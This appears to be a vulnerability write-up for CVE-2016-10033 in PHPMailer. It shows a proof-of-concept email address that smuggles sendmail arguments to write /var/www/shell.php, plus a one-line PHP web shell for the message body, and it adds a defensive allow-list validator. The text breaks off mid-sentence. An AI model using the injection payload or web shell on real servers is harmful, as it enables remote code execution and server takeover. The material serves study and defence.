CVE-2016-10033: PHPMailer RCE
CVE-2016-10033 is a critical Remote Code Execution vulnerability affecting multiple versions of PHPMailer, one of the most widely used email-sending libraries in PHP applications.
The vulnerability arises from improper sanitization of user-controlled email addresses, which are later passed to the system’s mail transfer agent (sendmail) as command-line arguments, allowing extra sendmail options to be smuggled in through the address itself.
Proof of Concept
- Inject Sendmail Arguments via Email Address
By injecting extra parameters into the email address, we can instruct sendmail to write arbitrary data to a file:
"attacker@127.0.0.1\" -oQ/tmp/ -X/var/www/shell.php root"@127.0.0.1
The email payload above does the following:

| Argument | Purpose |
|---|---|
| `-oQ/tmp/` | Redirects the mail queue directory to /tmp/ |
| `-X/var/www/shell.php` | Writes the mail transaction log, including the email content, to a PHP file |
| `root` | Trailing recipient required to keep the sendmail command line syntactically valid |
This results in a file being created:
/var/www/shell.php
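The argument injection above works only because the address reaches sendmail with its embedded quotes and spaces intact. As an added defensive example (not PHPMailer's own code), the following PHP shows the check an application should apply before using any user-supplied address as the `-f` envelope sender for `mail()`: an allow-list of safe characters that rejects whitespace, quotes, backslashes and shell metacharacters outright. The function names `isShellSafeAddress()` and `buildSendmailParams()` are hypothetical, and the sample inputs are constructed from the PoC payload on this page plus a benign address.

```php
<?php
// Added example, not PHPMailer's code. Hypothetical helper names.
// Goal: never let a sender address carry extra sendmail options.

function isShellSafeAddress(string $address): bool
{
    // Deliberately conservative subset of RFC 5322: no quoted local parts,
    // no whitespace, no quotes or backslashes, no shell metacharacters.
    // Anything that could end one sendmail argument and start another fails.
    if ($address === '' || strlen($address) > 254) {
        return false;
    }
    return (bool) preg_match('/^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$/', $address);
}

function buildSendmailParams(string $sender): ?string
{
    // Returns the additional_parameters string for mail(), or null when the
    // sender is unsafe. Callers must then send WITHOUT -f rather than
    // "fixing" the value, since escaping alone is what this bug bypassed.
    if (!isShellSafeAddress($sender)) {
        return null;
    }
    return '-f' . $sender;
}

// Constructed inputs: the PoC payload from this page and a normal address.
$samples = [
    '"attacker@127.0.0.1\" -oQ/tmp/ -X/var/www/shell.php root"@127.0.0.1',
    'alice@example.com',
];

foreach ($samples as $s) {
    $params = buildSendmailParams($s);
    printf("%-70s => %s\n", $s, $params === null ? 'REJECTED' : "params: $params");
}
```

Running this prints `REJECTED` for the PoC payload and `params: -falice@example.com` for the benign address. The design choice worth noting is that the check is an allow-list, not an escaping step: `escapeshellcmd()` (which PHP's `mail()` applies to the extra parameters) leaves balanced double quotes alone, which is exactly why the quoted local part in the payload survives to the sendmail command line.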
- Inject PHP Web Shell in Email Body:
<?php system($_GET['0']);?>
When the email is processed, this PHP code is written directly into shell.php.
We may get an error like: Message could not be sent. Mailer Error: Could not instantiate mail function. The file will still have been created, however.
We can then access the file for code execution: